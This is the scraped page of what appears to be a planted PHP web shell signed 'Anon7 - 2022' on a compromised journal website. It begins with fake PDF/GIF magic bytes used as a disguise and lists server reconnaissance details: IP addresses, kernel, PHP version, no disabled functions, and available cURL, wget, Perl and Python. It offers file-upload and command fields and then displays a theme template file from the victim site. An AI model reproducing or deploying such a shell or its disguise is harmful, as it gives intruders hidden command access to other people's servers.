%PDF-1.7 GIF89;
shell
Server IP : 172.66.157.178  /  Your IP : 172.16.20.3
Web Server : Apache/2.4.25 (Debian)
System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User : application ( 1000)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /app/plugins/themes/JetliJournal/templates/index/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /app/plugins/themes/JetliJournal/templates/index/journal.tpl
{**
 * templates/index/journal.tpl
 *
 * Copyright (c) 2003-2012 John Willinsky
 * Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
 *
 * Journal index page.
 *
 *}

{assign var="isHome" value=false}
{if $journalDescription || $homepageImage || $additionalHomeContent}
    {assign var="isHome" value=true}
{/if}

{assign var="isPublishingMode" value=false}
{if $issue && $currentJournal->getSetting('publishingMode') != $smarty.const.PUBLISHING_MODE_NONE}
    {assign var="isPublishingMode" value=true}
{/if}

{strip}
{assign var="pageTitleTranslated" value=$siteTitle}
{include file="theme:public/common/header.tpl"}
{/strip}

{strip}
{assign var="pageTitleTranslated" value=$siteTitle}
{include file="common/header.tpl"}
{/strip}

{call_hook name="Templates::Index::journal"}



<div class="tab-content">


 
<div class="tab-pane active" id="tab-issue">

    <div id="tab-home" class="tab-pane">
      {if $journalDescription}
  <div id="journalDescription">{$journalDescription}</div>
      {/if}
      {if $homepageImage}
        <div id="homepageImage"><img src="{$publicFilesDir}/{$homepageImage.uploadName|escape:"url"}" width="{$homepageImage.width|escape}" height="{$homepageImage.height|escape}" {if $homepageImageAltText != ''}alt="{$homepageImageAltText|escape}"{else}alt="{translate key="common.journalHomepageImage.altText"}"{/if} /></div>
      {/if}
      {if $additionalHomeContent}
        <div id="additionalHomeContent">{$additionalHomeContent}</div>
      {/if}       
    </div>

     {if $enableAnnouncementsHomepage}
    <div class="tab-pane" id="tab-annuncements">
        {* Display announcements *}
  <div id="announcements-home">
    <h3>{translate key="announcement.announcementsHome"}</h3>
    {include file="announcement/list.tpl"}  
    <table class="announcementsMore">
      <tr>
        <td><a href="{url page="announcement"}">{translate key="announcement.moreAnnouncements"}</a></td>
      </tr>
    </table>
  </div>
    </div>
  {/if} 


        <h3>{$issue->getIssueIdentification()|strip_unsafe_html|nl2br}</h3>
  {include file="issue/view.tpl"}


    </div>

 


    

</div>

{include file="common/footer.tpl"}


Anon7 - 2022
SCDN GOK